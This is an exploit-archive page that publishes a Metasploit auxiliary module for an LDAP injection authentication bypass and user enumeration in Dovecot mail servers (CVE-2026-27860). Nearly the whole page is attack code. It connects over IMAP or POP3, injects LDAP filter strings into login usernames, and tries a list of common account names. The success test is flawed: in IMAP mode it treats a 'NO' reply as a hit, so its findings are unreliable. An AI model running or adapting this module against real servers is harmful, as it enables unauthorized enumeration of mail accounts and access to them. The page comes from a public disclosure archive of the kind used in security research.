Share
## https://sploitus.com/exploit?id=PACKETSTORM:219545
==================================================================================================================================
| # Title : Dovecot 3.1.0 LDAP Injection Authentication Bypass |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.dovecotpro.com/ |
==================================================================================================================================
[+] Summary : This Metasploit auxiliary module targets a LDAP injection vulnerability in Dovecot mail servers that can lead to authentication bypass or user enumeration via IMAP/POP3.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Dovecot LDAP Injection Authentication Bypass',
'Description' => %q{
Dovecot LDAP injection vulnerability.
},
'Author' => [
'indoushka'
],
'References' => [
['CVE', '2026-27860']
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2026-03-27'
)
)
register_options([
Opt::RPORT(143),
OptString.new('USERNAME', [false, 'Username', '']),
OptString.new('LDAP_FILTER', [false, 'LDAP filter', '']),
OptEnum.new('PROTOCOL', [true, 'Protocol', 'IMAP', ['IMAP', 'POP3']])
])
end
def run_host(ip)
print_status("Dovecot LDAP Injection CVE-2026-27860")
print_status("Target: #{ip}:#{rport}")
if datastore['USERNAME'].to_s.strip.empty?
enumerate_users
else
test_ldap_injection
end
end
def enumerate_users
print_status("Enumerating users...")
common_users = ['admin', 'root', 'postmaster', 'webmaster', 'test', 'user']
common_users.each do |user|
payload = "#{user})(|(uid=*"
vprint_status("Testing: #{user}")
if test_auth(payload)
print_good("User found: #{user}")
report_user(user)
end
sleep(0.5)
end
end
def test_ldap_injection
ldap_payload = datastore['LDAP_FILTER'].to_s.empty? ? "*)(uid=*" : datastore['LDAP_FILTER']
username = datastore['USERNAME']
test_username = "#{username})(#{ldap_payload}"
print_status("Testing injection: #{test_username}")
if test_auth(test_username)
print_good("LDAP injection possible for: #{username}")
report_ldap_vulnerability
else
print_error("No LDAP injection detected")
end
end
def test_auth(username)
sock = nil
begin
sock = connect
banner = sock.get_once
vprint_status("Banner: #{banner}")
if datastore['PROTOCOL'] == 'IMAP'
sock.put("a1 LOGIN \"#{username}\" \"test\"\r\n")
response = sock.get_once
vprint_status("Response: #{response}")
return true if response && (
response.include?('OK') ||
response.include?('NO') ||
response.include?('LDAP') ||
response.include?('search')
)
else
sock.put("USER #{username}\r\n")
response = sock.get_once
if response && response.include?('+OK')
sock.put("PASS test\r\n")
final = sock.get_once
return true if final && final.include?('+OK')
end
end
rescue => e
vprint_error("Error: #{e.message}")
ensure
disconnect(sock) if sock
end
false
end
def report_user(username)
report_note(
host: rhost,
port: rport,
type: 'dovecot.ldap.user',
data: { username: username }
)
end
def report_ldap_vulnerability
report_note(
host: rhost,
port: rport,
type: 'dovecot.ldap.injection',
data: {
vulnerable: true,
payload: datastore['LDAP_FILTER']
}
)
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================